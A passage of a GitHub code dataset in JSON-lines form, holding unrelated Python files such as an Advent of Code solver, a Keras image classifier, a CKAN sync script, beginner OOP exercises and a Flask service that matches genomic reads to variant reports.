list(data.v[path].data.cpu().numpy())\n\n\n\n","repo_name":"aaucsd/lemp","sub_path":"planner/learned/GNN_static_planner.py","file_name":"GNN_static_planner.py","file_ext":"py","file_size_in_byte":4591,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"72581041834","text":"def lines():\n words = []\n with open(\"input.txt\") as fp:\n line = fp.readline()\n while line:\n words.append(line)\n line = fp.readline()\n return words\n\n\n\ndef parse():\n pre_words = lines()\n wires = []\n for x in pre_words:\n wires.append(x.split(','))\n return wires\n\n\ndef draw_wire(wire):\n print(\"-----------------------------------------\")\n coord = {}\n index = [0, 0]\n 
for action in wire:\n a = action[0]\n number = int(action[1:])\n for i in range(number):\n if a == 'U':\n index = (index[0], index[1]+1)\n elif a == 'D':\n index = (index[0], index[1]-1)\n elif a == 'R':\n index = (index[0]+1, index[1])\n elif a == 'L':\n index = (index[0]-1, index[1])\n\n if index[0] in coord.keys():\n coord[index[0]].append(index[1])\n else:\n coord[index[0]] = [index[1]]\n \n \n return coord\n\n\n\ndef draw(wires):\n\n wire1 = draw_wire(wires[0])\n wire2 = draw_wire(wires[1])\n return (wire1, wire2)\n\n\ndef dist(x,y):\n return abs(0-x) + abs(0-y)\n\ndef solve():\n wires = parse()\n (a,b) = draw(wires)\n res = []\n print(len(a))\n print(len(b))\n for i in a.keys():\n if i in b.keys():\n for x in a[i]:\n if x in b[i]:\n res.append(dist(i, x))\n return min(res)\nprint(solve())","repo_name":"Barisimre/AdventOfCode2019","sub_path":"3-1.py","file_name":"3-1.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"741726368","text":"from automato import automato\r\naf = automato(\r\n estados={'q0', 'q1', 'q2'},\r\n inicial='q0', finais={'q1'},\r\n transicoes={\r\n 'q0': {'0': 'q0', '1': 'q1'},\r\n 'q1': {'0': 'q0', '1': 'q2'},\r\n 'q2': {'0': 'q2', '1': 'q1'}\r\n })\r\nprint(af.transicoes)\r\naf.testar_entrada('1')\r\n","repo_name":"Teyal/Language-Manipulation","sub_path":"testes/testsAF.py","file_name":"testsAF.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"ca","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4827104601","text":"import os\r\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\r\n\r\nfrom PIL import Image\r\nfrom keras.preprocessing.image import load_img, img_to_array\r\nimport numpy as np\r\nfrom keras.models import load_model\r\n\r\n\r\n\r\nmodel = load_model('FV.h5')\r\nlabels = {0: 'apple', 1: 'banana', 2: 'beetroot', 3: 'bell pepper', 4: 'cabbage', 5: 'capsicum', 6: 'carrot',\r\n 7: 'cauliflower', 8: 'chilli pepper', 9: 'corn', 10: 'cucumber', 11: 'eggplant', 12: 'garlic', 13: 'ginger',\r\n 14: 'grapes', 15: 'jalepeno', 16: 'kiwi', 17: 'lemon', 18: 'lettuce',\r\n 19: 'mango', 20: 'onion', 21: 'orange', 22: 'paprika', 23: 'pear', 24: 'peas', 25: 'pineapple',\r\n 26: 'pomegranate', 27: 'potato', 28: 'raddish', 29: 'soy beans', 30: 'spinach', 31: 'sweetcorn',\r\n 32: 'sweetpotato', 33: 'tomato', 34: 'turnip', 35: 'watermelon'}\r\n\r\nfruits = ['Apple', 'Banana', 'Bello Pepper', 'Chilli Pepper', 'Grapes', 'Jalepeno', 'Kiwi', 'Lemon', 'Mango', 'Orange',\r\n 'Paprika', 'Pear', 'Pineapple', 'Pomegranate', 'Watermelon']\r\nvegetables = ['Beetroot', 'Cabbage', 'Capsicum', 'Carrot', 'Cauliflower', 'Corn', 'Cucumber', 'Eggplant', 'Ginger',\r\n 'Lettuce', 'Onion', 'Peas', 'Potato', 'Raddish', 'Soy Beans', 'Spinach', 'Sweetcorn', 'Sweetpotato',\r\n 'Tomato', 'Turnip']\r\n\r\n\r\ndef processed_img(img_path):\r\n img = load_img(img_path, target_size=(224, 224, 3))\r\n img = img_to_array(img)\r\n img = img / 255\r\n img = np.expand_dims(img, [0])\r\n answer = model.predict(img)\r\n y_class = answer.argmax(axis=-1)\r\n print(y_class)\r\n y = \" \".join(str(x) for x in y_class)\r\n y = int(y)\r\n res = labels[y]\r\n print(res)\r\n return res.capitalize()\r\n\r\n\r\n\r\n","repo_name":"blizet/Fruit-and-Vegetable-Image-Recogntion","sub_path":"impo.py","file_name":"impo.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} 
+{"seq_id":"40106704861","text":"\nimport argparse\nimport os\nimport re\nimport requests\nimport sys\n\nfrom ckanapi import RemoteCKAN, NotFound\n\n\nclass ShowcaseMetadata(dict):\n \"\"\"Copy of CKAN shocase dict containing only non-internal attributes\n and with sorted extras and tags lists. That allows simple comparison\n with other instances.\n \"\"\"\n def __init__(self, showcase_meta_dict):\n super().__init__()\n keys = [\n 'author',\n 'author_email',\n 'name',\n 'notes',\n 'state',\n 'title',\n 'type',\n 'url',\n ]\n self.update({k: showcase_meta_dict.get(k) for k in keys})\n tags = [\n {k: td.get(k) for k in ['display_name', 'name', 'state']}\n for td in showcase_meta_dict.get('tags', [])]\n #self.update({\n # 'tags': sorted(tags, key=lambda x: x['display_name']),\n #})\n self._image_url = showcase_meta_dict.get('image_display_url')\n if self._image_url:\n full_image_name = os.path.basename(self._image_url)\n self._image_name = re.sub(r'^[\\d-]+\\.\\d{6}', '', full_image_name)\n else:\n self._image_name = ''\n\n\nclass ShowcaseUpdater:\n def __init__(self, source_repo, target_repo, tmp_dir):\n self.source_repo = source_repo\n self.target_repo = target_repo\n self.tmp_dir = tmp_dir\n\n def sync_showcases(self):\n source_names = [\n sc['name'] for sc in self.source_repo.action.ckanext_showcase_list()]\n for sc_name in source_names:\n source_sc = self.source_repo.action.ckanext_showcase_show(\n id=sc_name)\n source_sc_meta = ShowcaseMetadata(source_sc)\n try:\n target_sc = self.target_repo.action.ckanext_showcase_show(\n id=sc_name)\n except NotFound: # showcase not found -> create it\n image_dict = self.prepare_image_dict(\n source_sc_meta._image_url, source_sc_meta._image_name)\n source_sc_meta.update(image_dict)\n self.target_repo.action.ckanext_showcase_create(**source_sc_meta)\n else: # showcase found -> compare (and update metadata)\n target_sc_meta = ShowcaseMetadata(target_sc)\n needs_update = (source_sc_meta != target_sc_meta or\n source_sc_meta._image_name != target_sc_meta._image_name)\n if needs_update:\n image_dict = self.prepare_image_dict(\n source_sc_meta._image_url, source_sc_meta._image_name)\n source_sc_meta.update(image_dict)\n self.target_repo.action.ckanext_showcase_update(**source_sc_meta)\n self.sync_datasets(sc_name)\n \n def prepare_image_dict(self, image_url, image_name):\n image_dict = {'image_url': ''}\n if image_url.startswith(self.source_repo.address):\n image_file = self.download_file(image_url, image_name)\n image_dict['image_upload'] = open(image_file, 'rb')\n else: # external image\n image_dict['image_url'] = image_url\n return image_dict\n\n\n def download_file(self, url, filename):\n location = os.path.join(self.tmp_dir, filename)\n r = requests.get(url)\n with open(location, 'wb') as fd:\n for chunk in r.iter_content(4096):\n fd.write(chunk)\n return location\n\n def sync_datasets(self, showcase_name):\n def get_dataset_list(repo, showcase_name):\n return [\n package['name'] for package in\n repo.action.ckanext_showcase_package_list(\n showcase_id=showcase_name)]\n\n source_datasets = get_dataset_list(self.source_repo, showcase_name)\n target_datasets = get_dataset_list(self.target_repo, showcase_name)\n\n for dataset in source_datasets:\n if dataset not in target_datasets:\n self.target_repo.action.ckanext_showcase_package_association_create(\n showcase_id=showcase_name, package_id=dataset)\n\n for dataset in target_datasets:\n if dataset not in source_datasets:\n self.target_repo.action.ckanext_showcase_package_association_delete(\n 
showcase_id=showcase_name, package_id=dataset)\n\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser(\n        description='CKAN showcases synchronization')\n    parser.add_argument('--source', help='source repo URL')\n    parser.add_argument('--target', help='target repo URL')\n    parser.add_argument('--target-key', help='target API key')\n    parser.add_argument('--tmp-dir', help='tmp dir for images', default='/tmp/')\n\n    args = parser.parse_args()\n    if not all(vars(args).values()):\n        parser.print_help()\n        sys.exit(1)\n\n    source_repo = RemoteCKAN(args.source)\n    target_repo = RemoteCKAN(args.target, args.target_key)\n    updater = ShowcaseUpdater(source_repo, target_repo, args.tmp_dir)\n    updater.sync_showcases()\n","repo_name":"janaslo/ckan-sync-showcases","sub_path":"sync_showcase.py","file_name":"sync_showcase.py","file_ext":"py","file_size_in_byte":5086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8025727198","text":"\"\"\"\nThis is a stack implemented with a linked list. This will be used for\nthe text editor logic.\n\"\"\"\nclass Stack:\n    \"\"\"Class used on a last in, first out basis. Uses a linked list as the data structure\"\"\"\n\n    def __init__(self, initStack=[]):\n        \"\"\"Initializer for the stack class. Defaults to an empty linked list\"\"\"\n        self.head = None\n        if not isinstance(initStack, list):\n            raise ValueError(\"When initializing the stack, you must use a list object\")\n        if initStack: #If there are items in the stack\n            for i in initStack[::-1]:\n                self.append(i)\n\n    class __Node:\n        \"\"\"A private node class used as the data points in the linked list\"\"\"\n        def __init__(self, data, next = None):\n            \"\"\"Initializer for the Node\"\"\"\n            self.data = data\n            self.next = next\n\n    def append(self, item):\n        \"\"\"Adds an item to the stack\"\"\"\n        self.head = self.__Node(item, self.head)\n\n    def pop(self):\n        \"\"\"Removes the top element in the stack and returns the value\"\"\"\n        if self.head is None:\n            raise IndexError(\"You can't use pop() with no elements in the stack\")\n        tmp = self.head\n        self.head = self.head.next\n        return tmp.data\n\n    def peek(self):\n        \"\"\"Returns, but doesn't remove, the top element from the stack\"\"\"\n        if self.head is None:\n            raise IndexError(\"You can't use peek() with no elements in the stack\")\n        tmp = self.head.data\n        return tmp\n    \n    def __str__(self):\n        \"\"\"Returns the stack as a string object\"\"\"\n        output = \"[\"\n        if self.head is None:\n            return output + \"]\"\n        cursor = self.head\n        while cursor.next is not None:\n            if isinstance(cursor.data, str):\n                output += \"'\" + str(cursor.data) + \"', \"\n            else:\n                output += str(cursor.data) + \", \"\n            cursor = cursor.next\n        if cursor.next is None:\n            if isinstance(cursor.data, str):\n                output += \"'\" + str(cursor.data) + \"'\"\n            else:\n                output += str(cursor.data)\n        return output + \"]\"\n    \n    def __repr__(self):\n        \"\"\"Returns the stack as a string\"\"\"\n        output = \"[\"\n        if self.head is None:\n            return output + \"]\"\n        cursor = self.head\n        while cursor.next is not None:\n            if isinstance(cursor.data, str):\n                output += \"'\" + str(cursor.data) + \"', \"\n            else:\n                output += str(cursor.data) + \", \"\n            cursor = cursor.next\n        if cursor.next is None:\n            if isinstance(cursor.data, str):\n                output += \"'\" + str(cursor.data) + \"'\"\n            else:\n                output += str(cursor.data)\n        return output + \"]\"\n\n    def __len__(self):\n        \"\"\"Returns the length of the stack\"\"\"\n        cursor = self.head\n        length = 0\n        while cursor is not None:\n            length += 1\n            cursor = 
cursor.next\n        return length\n","repo_name":"PorterDalton1/Text_Editor","sub_path":"textStack.py","file_name":"textStack.py","file_ext":"py","file_size_in_byte":3043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11372974901","text":"from rdflib import Literal\nfrom restriction.abstract_restriction import NameRestriction\nfrom restriction.physcial_restriction import PhyscialCharacteristicRestriction\nfrom restriction.conceptual_restriction import ConceptualCharacteristicRestriction\n\nclass EquivalentClass:\n    def __init__(self,restrictions=[]):\n        self.restrictions = restrictions\n\nclass EquivalentProperty:\n    def __init__(self,equivalents):\n        self.equivalents = equivalents\n\nclass PhysicalEquivalent(EquivalentClass):\n    def __init__(self,restrictions=[]):\n        if restrictions == []:\n            r = [PhyscialCharacteristicRestriction()]\n        else:\n            r = restrictions\n        super().__init__(r)\n    \nclass ConceptualEquivalent(EquivalentClass):\n    def __init__(self,restrictions=[]):\n        if restrictions == []:\n            r = [ConceptualCharacteristicRestriction()]\n        else:\n            r = restrictions\n        super().__init__(r)\n\nclass NameEquivalentClass(EquivalentClass):\n    def __init__(self, names):\n        if not isinstance(names,list):\n            names = [names]\n        r = [NameRestriction(names)]\n        super().__init__(restrictions=r)\n\nclass NameEquivalentProperty(EquivalentProperty):\n    def __init__(self, names):\n        if not isinstance(names,list):\n            names = [names]\n        names = [Literal(n) for n in names]\n        super().__init__(names)","repo_name":"intbio-ncl/genet2","sub_path":"app/graph/utility/model/nv_graph_build/equivalent/abstract_equivalent.py","file_name":"abstract_equivalent.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"18111868661","text":"# DFS: stack, recursive function\n\ndef dfs(graph, v, visited):\n    # mark the current node as visited\n    visited[v] = True\n    print(v, end=' ')\n\n    # recursively visit the other nodes connected to the current node\n    for i in graph[v]:\n        if not visited[i]:\n            dfs(graph,i, visited)\n\ngraph = [\n    [],\n    [2,3,8],\n    [1,7],\n    [1,4,5],\n    [3,5],\n    [3,4],\n    [7],\n    [2,6,8],\n    [1,7]\n]\n\nvisited = [False]*9\n\ndfs(graph,1, visited)\n","repo_name":"DaAlG/code_studying","sub_path":"seojin/개별문제/0117/dfs.py","file_name":"dfs.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"ko","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"24660574123","text":"\"\"\"add_crawler_table\n\nRevision ID: bba37bac95b0\nRevises: 444c7f1a4166\nCreate Date: 2021-03-09 02:58:04.265958\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = 'bba37bac95b0'\ndown_revision = '444c7f1a4166'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n\top.create_table('crawler',\n\t\tsa.Column('path_id', sa.Integer(), nullable=False),\n\t\tsa.Column('updated_dttm', postgresql.TIMESTAMP(), server_default=sa.text('to_timestamp(0)'), nullable=False),\n\t\tsa.ForeignKeyConstraint(['path_id'], ['path.path_id'], ondelete=\"CASCADE\"),\n\t\tsa.PrimaryKeyConstraint('path_id'),\n\t\tschema='scans'\n\t)\n\top.create_index(op.f('ix_scans_crawler_updated_dttm'), 'crawler', ['updated_dttm'], unique=False, schema='scans')\n\top.execute(\"\"\"\n\t\tCREATE TRIGGER host_audit\n\t\tAFTER INSERT OR UPDATE OR DELETE ON scans.crawler\n\t\tFOR EACH ROW EXECUTE PROCEDURE audit.if_modified_func();\n\t\"\"\")\n\n\n\ndef 
downgrade():\n\top.drop_table('crawler', schema='scans')\n","repo_name":"IMEsec-USP/VuMoS","sub_path":"src/alembic/alembic/versions/20210309025804_bba37bac95b0_add_crawler_table.py","file_name":"20210309025804_bba37bac95b0_add_crawler_table.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31262175852","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Jul 16 09:41:53 2020\r\n\r\n@author: Mynuddin\r\n\"\"\"\r\nclass Person:\r\n def __init__(self,fname , lname , age):\r\n #instance variables\r\n self.fname = fname\r\n self.lname = lname\r\n self.age = age\r\n \r\n def fulname(self):# instance method\r\n return f\"{self.fname }{self.lname}\"\r\n \r\n def is_above(self): #instance method work for every instance or object\r\n return self.age>18\r\n \r\n \r\n \r\n \r\n \r\nP1 = Person(\"Mynuddin \",\"Hasan\",21)\r\nP2 = Person(\"Tanzia islam \",\"Mim\",20)\r\n\r\nprint(P1.fulname())\r\nprint(P2.fulname())\r\n\r\nprint(Person.fulname(P1)) # P1----> self as an object\r\nprint(Person.fulname(P2))\r\n\r\nprint(P1.is_above())\r\n\r\n\r\n\r\nl=[1,2,3,4] # here l is an object of List \r\n\r\n# lets clear or pop method\r\nprint(l.pop())\r\nprint(list.pop(l))\r\n#list predefine class\r\nlist.append(l,10)\r\nprint(l)\r\n\r\n\r\n\r\n\r\n\r\n#exercise 190\r\n\r\nclass Computer:\r\n def __init__(self,b_name,m_name,Price): \r\n # instance variables\r\n self.brand_name=b_name\r\n self.model_name = m_name\r\n self.Price = Price\r\n #self.brand_mpdel_name= b_name , m_name youcan also do it\r\n \r\n \r\n def percentage(self,num):\r\n off_price = (num/100)*self.Price\r\n return self.Price - off_price\r\n \r\n # def percentage1(self):\r\n # return self.Price - (10/100)*self.Price\r\n \r\n \r\ncomp1=Computer(\"HP\",\"corei5 8GB 1TB HDD\",63000) \r\ncomp2=Computer(\"ASUS\",\"corei7 16GB 1TB HDD\",83000)\r\n\r\nprint(comp1.brand_name , comp1.model_name ,comp1.Price,\"TK\")\r\n\r\nprint(comp1.percentage(10))\r\nprint(comp2.percentage(10))\r\n\r\n#print(comp1.percentage1())\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n# -----------------------------class variable-----------------------------\r\n\r\n\r\nclass Computer:\r\n \r\n percent =10 # class variable --> sharable for every object\r\n \r\n def __init__(self,b_name,m_name,Price): \r\n \r\n # instance variables difference for every object \r\n \r\n self.brand_name=b_name\r\n self.model_name = m_name\r\n self.Price = Price\r\n #self.brand_mpdel_name= b_name , m_name youcan also do it\r\n \r\n \r\n def percentage(self):\r\n off_price = (Computer.percent/100)*self.Price\r\n return self.Price - off_price\r\n \r\n # def percentage1(self):\r\n # return self.Price - (10/100)*self.Price\r\n \r\n \r\ncomp1=Computer(\"HP\",\"corei5 8GB 1TB HDD\",63000) \r\ncomp2=Computer(\"ASUS\",\"corei7 16GB 1TB HDD\",83000)\r\n\r\nprint(comp1.brand_name , comp1.model_name ,comp1.Price,\"TK\")\r\n\r\nprint(comp1.percentage())\r\n\r\nprint(comp1.__dict__)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n# Another Example\r\n \r\nclass Circle:\r\n \r\n pi=3.1415 # class variable --> sharable for every object\r\n\r\n def __init__(self,radious):\r\n self.radious=radious\r\n \r\n def area(self):\r\n return (2*self.radious*Circle.pi)\r\n\r\nc1 = Circle(10)\r\nc2 = Circle(20)\r\n\r\nprint(c1.area())\r\nprint(c2.area())\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n# Another Example from Navin\r\n\r\nclass Employee:\r\n increment=1.5 #class variable ---> sharable \r\n no_of_employee=0\r\n def 
__init__(self,fname,lname,salary):\r\n self.fname=fname \r\n self.lname=lname\r\n self.salary=salary\r\n self.increment=1.4 #instance variable\r\n Employee.no_of_employee +=1\r\n \r\n def increase(self):\r\n #self.salary = self.salary*Employee.increment #use class variable\r\n #self.salary = self.salary*self.increment #first search in instance\r\n #variable if not find take\r\n #class variable\r\n\r\n self.salary = self.salary*self.increment\r\nprint(Employee.no_of_employee)\r\nharray=Employee(\"Harry\",\"Potter\",44000)\r\nprint(Employee.no_of_employee)\r\nrohan=Employee(\"Rohan\",\"Sharma\",55000) \r\nprint(Employee.no_of_employee)\r\n\r\n \r\nprint(harray.salary)\r\nharray.increase()\r\nprint(harray.salary) \r\n\r\nprint(harray.__dict__) #instance variable print \r\nprint(rohan.__dict__)\r\n\r\n\r\n\r\n\r\n# As like above\r\nclass Computer:\r\n \r\n percent =10 # class variable --> sharable for every object\r\n \r\n def __init__(self,b_name,m_name,Price): \r\n \r\n # instance variables difference for every object \r\n \r\n self.brand_name=b_name\r\n self.model_name = m_name\r\n self.Price = Price\r\n self.percent=20 # first check it \r\n \r\n def percentage(self):\r\n off_price = (self.percent/100)*self.Price\r\n return self.Price - off_price\r\n \r\n # def percentage1(self):\r\n # return self.Price - (10/100)*self.Price\r\n \r\n \r\ncomp1=Computer(\"HP\",\"corei5 8GB 1TB HDD\",63000) \r\ncomp2=Computer(\"ASUS\",\"corei7 16GB 1TB HDD\",83000)\r\n \r\nprint(comp1.percentage())\r\n\r\n","repo_name":"Mynuddin-dev/Practice-Python-02","sub_path":"OOPs/Instance method.,variables and class variablespy.py","file_name":"Instance method.,variables and class variablespy.py","file_ext":"py","file_size_in_byte":4811,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"39404972721","text":"# Title: Counting Sheep (Small)\n# Retrieved from \n# https://www.acmicpc.net/problem/9498\n\n# Q:\n# Print Score according to the interger given\n\n# A:\n\n\nimport sys\n\ndef scorePrint(score):\n if score >= 90:\n return \"A\"\n if score >= 80:\n return \"B\"\n if score >= 70:\n return \"C\"\n if score >= 60:\n return \"D\"\n return \"F\"\n\nscore = sys.stdin.readline().rstrip(\"\\n\")\nresult = scorePrint(int(score))\nprint (result)\n\n#\n# For better readability, instead of using if~, elif~ , ..., elif~, else~\n# I have used if~ return, if~ return ...\n# It still produces the same result\n","repo_name":"AliceSeo/preparationForCodingCompetition","sub_path":"print_score.py","file_name":"print_score.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37075053337","text":"from pathlib import Path\n\nfrom setuptools import find_packages, setup\n\n\nthis_directory = Path(__file__).parent\nlong_description = (this_directory / \"README.md\").read_text()\n\nsetup(\n name=\"t2m\",\n version=\"0.0.2\",\n description=\"Text To Motion\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n author=\"Chanhyuk Jung\",\n package_dir={\"\": \"src\"},\n packages=find_packages(where=\"src\"),\n python_requires=\">=3.7\",\n install_requires=[\n \"numpy==1.23.1\",\n \"patool\",\n \"torch\",\n \"einops\",\n \"scipy\",\n \"click\",\n \"pandas\",\n \"jsonargparse\",\n \"tqdm\",\n \"requests\",\n \"lightning>=2.0\",\n \"gdown\",\n \"requests\",\n \"matplotlib>=3.6.0\",\n \"imageio\",\n \"smplx\",\n \"chumpy\",\n \"pyrender\",\n \"shapely\",\n 
\"h5py\",\n \"mapbox_earcut\",\n \"pygifsicle\",\n \"dask\",\n ],\n extras_require={\n \"test\": [\"pytest\", \"pytest-xdist\"],\n \"dev\": [\"black\", \"ruff\", \"bumpver\"],\n },\n)\n","repo_name":"urw7rs/t2m","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"14201343121","text":"def i2h(integer):\n hexmap = {\n 0: \"0\",\n 1: \"1\",\n 2: \"2\",\n 3: \"3\",\n 4: \"4\",\n 5: \"5\",\n 6: \"6\",\n 7: \"7\",\n 8: \"8\",\n 9: \"9\",\n 10: \"A\",\n 11: \"B\",\n 12: \"C\",\n 13: \"D\",\n 14: \"E\",\n 15: \"F\"\n }\n\n hexlist = []\n number = integer\n temp = int(number)\n while True:\n hexlist.insert(0, hexmap[temp % 16])\n temp //= 16\n if str(int(\"\".join(hexlist), 16)) == number:\n break\n\n finalhex = \"\".join(hexlist)\n #print(\"Hexidecimal '\" + number + \"' is '\" + finalhex + \"'.\")\n return(finalhex)\n\ndef h2i(hexadecimal):\n return int(hexadecimal, 16)\n \ndef a2b(msg, tofile=False):\n if not tofile:\n return (str(bin(int.from_bytes(msg.encode(), 'big')))).replace('b', '')\n else:\n with open('Binary.txt', 'w') as file:\n file.write(bin(int.from_bytes(msg.encode(), 'big')))\n\ndef b2a(binary, fromfile=False):\n if not fromfile:\n binary = binary.replace(' ', '')\n n = int(binary, 2)\n return n.to_bytes((n.bit_length() + 7) // 8, 'big').decode()\n else:\n with open('Binary.txt', 'r') as file:\n string = (file.read()).replace(\" \", \"\")\n n = int(string, 2)\n with open('Text.txt', 'w') as file:\n file.write(n.to_bytes((n.bit_length() + 7) // 8, 'big').decode())\n\n#def b2h(binary):\n #while len\n","repo_name":"Lordfirespeed/BunchaPythonStuff","sub_path":"Misc/Conversions.py","file_name":"Conversions.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3581613164","text":"from __future__ import division\nfrom flask import Flask, Response, request, render_template, session\nimport ijson\nimport requests\nimport simplejson as json\nimport collections\nimport re\nfrom gevent.pool import Pool\nfrom gevent import monkey as curious_george\nfrom functools import partial\nfrom settings import GOOGLE_API_KEY, SECRET_KEY\nfrom models import CachedReads\nfrom variant_mapper import match, get_ref_length\n\ncurious_george.patch_all()\n\napp = Flask(__name__)\napp.secret_key = SECRET_KEY\n\nREPOSITORIES = {\n 'google': 'https://www.googleapis.com/genomics/v1beta/',\n 'ncbi': 'http://trace.ncbi.nlm.nih.gov/Traces/gg/',\n 'ebi': 'http://193.62.52.16/'\n}\nMIN_DISTANCE = 100\nCoordinate = collections.namedtuple('Coordinate', 'chrom start end')\n\n\nclass HTTPStream():\n '''\n Turn requests.Response into a stream\n '''\n def __init__(self, response):\n self.response = response\n def read(self, size):\n if not hasattr(self, 'iter'):\n self.iter = iter(self.response.iter_content(chunk_size=size))\n try:\n return next(self.iter)\n except StopIteration:\n return ''\n\n\n\ndef find_cached_read(report, repository, readset_id):\n '''\n Find cached read by report \n '''\n return CachedReads.find_one({\n 'repository': repository,\n 'readsetId': readset_id,\n 'referenceSequenceName': report['chrom'],\n 'start': {'$lte': report['seqStart']},\n 'end': {'$gt': report['seqEnd']}\n })\n\n\ndef push_coordinates(coordinates, new_coord):\n '''\n Given a list of existing coordinates and a single new coordinate, return a new list of coordinates,\n optimizing search 
operation of reads.\n    '''\n    for i, coord in enumerate(coordinates):\n        if coord.chrom != new_coord.chrom:\n            continue\n        #calculate size of the distance between two coordinates\n        upper = max(coord.start, new_coord.start)\n        lower = min(coord.end, new_coord.end)\n        coord_index = i\n        #meaning the two coordinates overlap\n        if upper <= lower or (upper - lower) <= MIN_DISTANCE:\n            start = min(coord.start, new_coord.start)\n            end = max(coord.end, new_coord.end)\n            coordinates[i] = Coordinate(coord.chrom, start, end)\n            break\n    else:\n        coordinates.append(new_coord)\n        coord_index = len(coordinates) - 1\n    #coord_index tells the index of the newly inserted coordinate\n    return coordinates, coord_index\n\n\ndef make_read_search(repo_id, readset_id, coordinate, coord_index):\n    '''\n    Construct a search on the read api; returns a requests.Response object\n    '''\n    search_data = {\n        'readsetIds': [readset_id],\n        'sequenceName': coordinate.chrom,\n        'sequenceStart': coordinate.start,\n        'sequenceEnd': coordinate.end\n    }\n    if repo_id == 'google':\n        api_key = 'key=%s&' % GOOGLE_API_KEY\n    else:\n        api_key = ''\n    search_url = '%sreads/search?%scoord_index=%s' % (REPOSITORIES[repo_id], api_key, coord_index)\n    return requests.post(search_url,\n                         data=json.dumps(search_data),\n                         stream=True,\n                         headers={'Content-Type': 'application/json; charset=UTF-8'})\n\n\n\n\n@app.route('/<repo_id>/<path:endpoint>', methods=['GET', 'POST'])\ndef ga_api(repo_id, endpoint):\n    '''\n    Makes GA4GH read api call for the front end.\n    '''\n    url = REPOSITORIES[repo_id] + endpoint\n    if repo_id == 'google':\n        url += '?key=%s' % GOOGLE_API_KEY\n        url += '&coord_id=1'\n    options = {'stream': True}\n    if request.method == 'POST':\n        options['data'] = request.data\n        options['headers'] = {'Content-Type': 'application/json; charset=UTF-8'}\n    response = requests.request(request.method, url, **options)\n    return Response(response.iter_content(),\n                    content_type='application/json; charset=UTF-8',\n                    status=response.status_code)\n\n\n\ndef lookup_and_match(info):\n    '''\n    Look up a report in the cache and match it if found\n    '''\n    report, repo, readset_id = info\n    matched = False\n    found = False\n    cached_read = find_cached_read(report, repo, readset_id)\n    if cached_read:\n        found = True\n        if match(report, cached_read):\n            matched = True\n    return found, matched, report\n\n\n@app.route('/match_reports', methods=['POST'])\ndef match_reports():\n    report_set = json.loads(request.data)\n    coordinates = []\n    coord_indices = {}\n    matched_reports = []\n    matching_result = []\n    lookupPool = Pool(50)\n\n    for found, matched, report in lookupPool.imap(lookup_and_match, \n            ((r, report_set['repository'], report_set['readsetId']) \n            for r in report_set['reports'])):\n        if report['clinicalSignificance'] in ('Uncertain significance', 'not provided', 'conflicting data from submitters', 'other'):\n            continue\n        if not found:\n            new_coord = Coordinate(report['chrom'], report['seqStart'], report['seqEnd'])\n            coordinates, coord_index = push_coordinates(coordinates, new_coord)\n            coord_indices.setdefault(coord_index, []).append(report)\n        elif matched:\n            matched_reports.append(report)\n\n\n    read_search = partial(make_read_search,\n                          report_set['repository'],\n                          report_set['readsetId'])\n\n    def search_and_match(coord_index):\n        coord = coordinates[coord_index]\n        result = read_search(coord, coord_index)\n        reads = ijson.items(HTTPStream(result), 'reads.item')\n        reports = coord_indices[coord_index]\n        reports_visited = []\n        for read in reads:\n            read_coord = Coordinate(read['referenceSequenceName'],\n                                    read['position'],\n                                    
read['position']+get_ref_length(read['cigar']))\n covered_reports = [report for report in reports\n if (read_coord.chrom == report['chrom'] and\n read_coord.start <= report['seqStart'] and\n read_coord.end > report['seqEnd'])]\n if covered_reports:\n new_matched_reports = [report for report in covered_reports \n if (report['reportId'] not in reports_visited and\n match(report, read))]\n matched_reports.extend(new_matched_reports)\n reports_visited.extend([report['reportId'] for report in covered_reports\n if report['reportId'] not in reports_visited])\n #push read into cache:\n read['repository'] = report_set['repository']\n read['readsetId'] = report_set['readsetId']\n read['start'] = read['position']\n read['end'] = read['position'] + get_ref_length(read['cigar'])\n CachedReads.save(read)\n if len(reports_visited) >= len(reports):\n break\n\n searchPool = Pool(50)\n (_ for _ in searchPool.imap(search_and_match, coord_indices.keys()))\n\n return Response(json.dumps(matched_reports), content_type='application/json; charset=UTF-8')\n\n\n\n\n@app.route('/register')\ndef register():\n session['repo'] = request.args['repo']\n session['dataset'] = 